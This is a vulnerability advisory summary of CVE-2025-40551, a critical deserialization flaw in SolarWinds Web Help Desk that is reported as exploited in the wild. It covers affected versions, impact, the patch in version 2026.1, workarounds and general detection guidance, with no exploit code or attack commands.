Full Report
CISA flags critical SolarWinds CVE-2025-40551 flaw as exploited in attacks. Learn all of the key details.
Analysis Summary
# Vulnerability: SolarWinds Web Help Desk Deserialization Flaw Leading to RCE
## CVE Details
- CVE ID: CVE-2025-40551
- CVSS Score: 9.8/10 (Critical)
- CWE: Deserialization of Untrusted Data
## Affected Systems
- Products: SolarWinds Web Help Desk (WHD)
- Versions: Versions prior to 2026.1
- Configurations: Any exposed instance of WHD.
## Vulnerability Description
The vulnerability is a critical "deserialization of untrusted data" flaw located within the **AjaxProxy component** of SolarWinds Web Help Desk. Successful exploitation allows a remote, unauthenticated attacker to execute arbitrary commands on the underlying host machine (Remote Code Execution - RCE). This bug appears to be related to bypasses of previous security patches affecting the same component.
## Exploitation
- Status: Exploited in the wild; added to CISA's KEV catalog.
- Complexity: Implied Low, given the lack of authentication requirement for exploitation.
- Attack Vector: Network
## Impact
- Confidentiality: High (Potential exfiltration of sensitive data including support tickets, credentials, and network details).
- Integrity: High (Ability to modify or delete critical system data).
- Availability: High (Potential for malware/ransomware installation leading to service disruption).
## Remediation
### Patches
- **SolarWinds Web Help Desk version 2026.1** is the fixed version released on January 28, 2026. Federal agencies were mandated to patch by February 6, 2026.
### Workarounds
- For organizations unable to immediately patch, isolation of the affected server, rotation of any credentials accessible by the service, and comprehensive forensic auditing should be prioritized according to CISA directives.
## Detection
- Indicators of Compromise: Monitor for unusual process executions originating from the Web Help Desk service account, unexpected network connections, or the installation of unfamiliar malware/ransomware on the WHD host server.
- Detection methods and tools: Full forensic audit upon suspicion of compromise; monitoring system logs for known RCE patterns associated with deserialization attacks.
## References
- Vendor Advisory (Implied): SolarWinds advisory concerning version 2026.1 release.
- CISA KEV Catalog Entry (Implied): References the inclusion of CVE-2025-40551 in the Known Exploited Vulnerabilities catalog.